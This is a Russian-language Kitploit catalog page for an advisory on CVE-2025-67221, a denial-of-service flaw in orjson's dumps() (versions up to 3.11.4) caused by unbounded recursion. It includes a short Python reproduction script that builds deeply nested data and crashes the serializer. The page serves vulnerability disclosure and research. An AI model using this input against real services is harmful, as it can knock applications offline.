Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-67221 — Документация и код воспроизведения для CVE-2025-67221, уязвимости отказа в обслуживании в функции dumps() библиотеки orjson, вызванной неконтролируемой рекурсией при сериализации глубоко вложенных JSON-данных. | Kitploit
Инструменты/GitHubGitHub/kpatsakis/cve-2025-67221
Анализ уязвимостейАнализ КодаСтатьи и ИсследованияОбучение и Образование
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

Документация и код воспроизведения для CVE-2025-67221, уязвимости отказа в обслуживании в функции dumps() библиотеки orjson, вызванной неконтролируемой рекурсией при сериализации глубоко вложенных JSON-данных.

Репозиторий
1127 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-67221

Сводка по уязвимости

ПолеЗначение
CVE IDCVE-2025-67221
Затронутый продуктorjson
Затронутые версии≤ 3.11.4
Тип уязвимостиОтказ в обслуживании (неконтролируемая рекурсия)
Вектор атакиУдалённо (если атакующий контролирует сериализуемые данные)

Описание

В функции orjson.dumps() в orjson версиях 3.11.4 и более ранних существует уязвимость, приводящая к отказу в обслуживании. Функция не обеспечивает ограничение глубины рекурсии при сериализации глубоко вложенных структур данных JSON. Атакующий, который может заставить приложение сериализовать контролируемые им вложенные данные, может вызвать аварийное завершение процедуры сериализации.

Затронутая функция

  • Функция: orjson.dumps()
  • Файл: pysrc/orjson/__init__.pyi

Тесты

Протестировано на

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 на Ubuntu Linux с ядром 6.8.0-88
  • Python 3.13.3 на Microsoft Windows 11 Education 10.0.26200 Build 26200

Воздействие

Приложения, использующие orjson для сериализации недоверенных или контролируемых атакующим структур данных, могут быть уязвимы к атакам типа «отказ в обслуживании».

Код воспроизведения

Код для локального воспроизведения уязвимости:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

##Demo Приведённый выше код приводит к созданию core dump Demo

Авторы / исследователи

  • Constantinos Patsakis, факультет информатики, Университет Пирея, Греция
  • Evgenios Gkritsis, факультет информатики, Афинский университет экономики и бизнеса, Греция
  • George Stergiopoulos, факультет информатики, Афинский университет экономики и бизнеса, Греция

Ссылки

  • https://github.com/ijl/orjson (Затронутый проект)
Скачать инструмент